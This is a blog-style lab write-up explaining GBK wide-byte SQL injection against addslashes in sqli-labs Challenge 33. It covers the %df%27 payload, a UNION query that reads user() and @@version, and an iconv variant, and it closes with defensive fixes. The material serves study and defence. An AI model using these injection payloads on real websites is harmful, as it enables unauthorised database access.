Recently, I’ve been studying PHP code auditing and came across wide byte injection again. Although I had learned about it a long time ago, I never had the chance to try it. So, I decided to revisit it using sqli-labs. For this analysis, I used Challenge 33, GET – Bypass AddSlashes().

Many websites implement certain methods to prevent SQL injection, such as using MySQL escape functions like `addslashes`, `mysql_real_escape_string`, and `mysql_escape_string` (or `magic_quote_gpc`, which has been removed in higher PHP versions). These functions are designed to sanitize user input by escaping special characters with a backslash (`\`). However, under specific conditions, wide byte injection can bypass these functions.
Wide byte injection is also known as:
GBK Double-Byte Bypass
Let’s use this challenge to demonstrate the injection process and analyze the principle behind it.

Start by testing with a single quote. No error is thrown, but the output reveals that the single quote has been escaped. Since this is a wide byte injection, we prepend `%df` to the single quote. When the single quote is escaped, a backslash (`\`) is added before it. The URL encoding for `\` is `%5c`. As a result, the `id` parameter passed to the code becomes:
%df%5c%27
Here’s the key: `%df` consumes `%5c`, forming a new byte. Due to `%df`, the encoding `%5c` loses its escaping effect and is directly passed to MySQL. When MySQL interprets this, it ignores the `%df%5c` combination, allowing the single quote to regain its functionality.

Since we get an error, it confirms that our attempt is correct, and injection is possible.

Using a `UNION` query, we can extract some information. However, let’s return to the main topic.
Why does adding `%df` work? This is due to a MySQL characteristic. GBK is a multi-byte encoding system where two bytes represent a single character. When `%df` is added, it combines with the escape character (`\`, or `%5c`) to form a new character, such as “運”. As a result, the single quote escapes.
As long as the first byte combines with `%5c` to form a valid GBK character, the bypass is successful. Specifically, the first byte’s ASCII value must be greater than 128.
Let’s examine the critical source code for this challenge:

The `check_addslashes` function is used to process the input parameters. Essentially, it’s a wrapper for `addslashes`. Let’s look at its functionality:

In simple terms, it prepends a backslash.
Here’s how I understand it, illustrated for clarity:

Wide byte injection occurs when PHP sends a request to MySQL, and the character set specified by `character_set_client` performs an encoding.
Let’s print the SQL statement:
SELECT * FROM users WHERE id=’-1運’ union select 1,user(),@@version#’ LIMIT 0,1
In MySQL, this executes as:

Why does `%df%5c%27` become 運’ when passed to MySQL?
As mentioned earlier, wide byte injection occurs when PHP sends a request to MySQL, and the character set specified by `character_set_client` performs an encoding. This encoding causes the transformation.
The data transformation process is as follows:
%df%27 ===> (addslashes) ===> %df%5c%27 ===> (GBK) ===> 運’
User Input ==> Filtering Function ==> Code Layer SQL ==> MySQL Request Handling ==> MySQL SQL Execution
mysql_query("SET NAMES gbk");
When this line is executed in the code, all three character sets (client, connection, and result set) are set to GBK encoding.
This is what causes the scenario described above.
What if we use UTF-8 encoding instead? Many websites do this. However, to avoid GBK characters submitted by users from becoming garbled, websites often convert GBK characters to UTF-8 using functions like `iconv` or `mb_convert_encoding` before embedding them into SQL statements.
Preventing Wide Byte Injection
One method is to first call mysql_set_charset
to set the current character set to GBK, then use the `mysql_real_escape_string` function to sanitize user input.
Alternatively, set character_set_client
to binary.
When MySQL receives data from the client, it assumes the data is encoded in `character_set_client`, converts it to `character_set_connection`, and then to the encoding of the specific table and field. When the query result is generated, it is converted from the table and field encoding to `character_set_results` before being sent back to the client.
Injection Caused by iconv
Using the function iconv('utf-8','gbk',$_GET['id'])
can also lead to injection.
Even if character_set_client
is set to binary, the parameter may later be converted back to GBK. Injection can occur using a string like “錦’”:
This is because the GBK encoding for “錦’” is `0xe55c`, which results in `%5c%27`. At this point, two `%5c` are present, and the backslash (`\`) is escaped, allowing the single quote to escape and causing injection.
Summary: Here’s a solution from others:
When programming, always use UTF-8 encoding to avoid wide byte injection. If GBK encoding must be used, take the following precautions:
1. Set `character_set_client=binary`.
2. When using `set names gbk` or `mysql_real_escape_string`, also use `mysql_set_charset` to set the character set.
3. Avoid using `iconv` to convert character encodings.
The best way to patch wide byte injection is:
(1) Use `mysql_set_charset(GBK)` to specify the character set.
(2) Use `mysql_real_escape_string` for escaping.
The principle is that `mysql_real_escape_string` differs from `addslashes` in that it considers the current character set, preventing the issue where `e5` and `5c` combine into a wide byte. The “current character set” is determined by `mysql_set_charset`. Both conditions must be met to prevent injection.